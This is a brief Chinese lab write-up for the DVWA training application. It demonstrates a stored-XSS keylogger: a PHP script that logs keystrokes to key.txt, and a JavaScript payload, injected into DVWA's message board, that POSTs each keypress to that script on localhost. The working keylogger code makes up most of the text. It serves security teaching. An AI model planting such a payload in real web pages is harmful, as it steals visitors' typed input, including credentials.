实验环境:DVWA
实验原理:网页被植入xss脚本,普通用户访问此网页时,该用户在当前页面上所有的键盘按键都会被记录下来,并且发送到远端服务器
实验步骤:
一、在服务器创建一个keylog.php文件获取键盘记录,并将记录写入key.txt中。
php代码如下:
<?php
$file=fopen("key.txt","a");
if(isset($_REQUEST['key'])){
$key=$_REQUEST['key'];
fputs($file,$key);
}
?>二、编写js脚本
<script>
window.onkeydown=function(ev){
xhr =new XMLHttpRequest();
xhr.open('POST','http://localhost/xss/keylog/keylog.php',true);
xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');
xhr.send('key='+String.fromCharCode(ev.keyCode));
}
</script>
三、打开低级别DVWA,选择储存xss模块,将js脚本写入留言框,执行代码
四、可看到当在输入框输入内容时,key.txt已经将键盘记录下来了
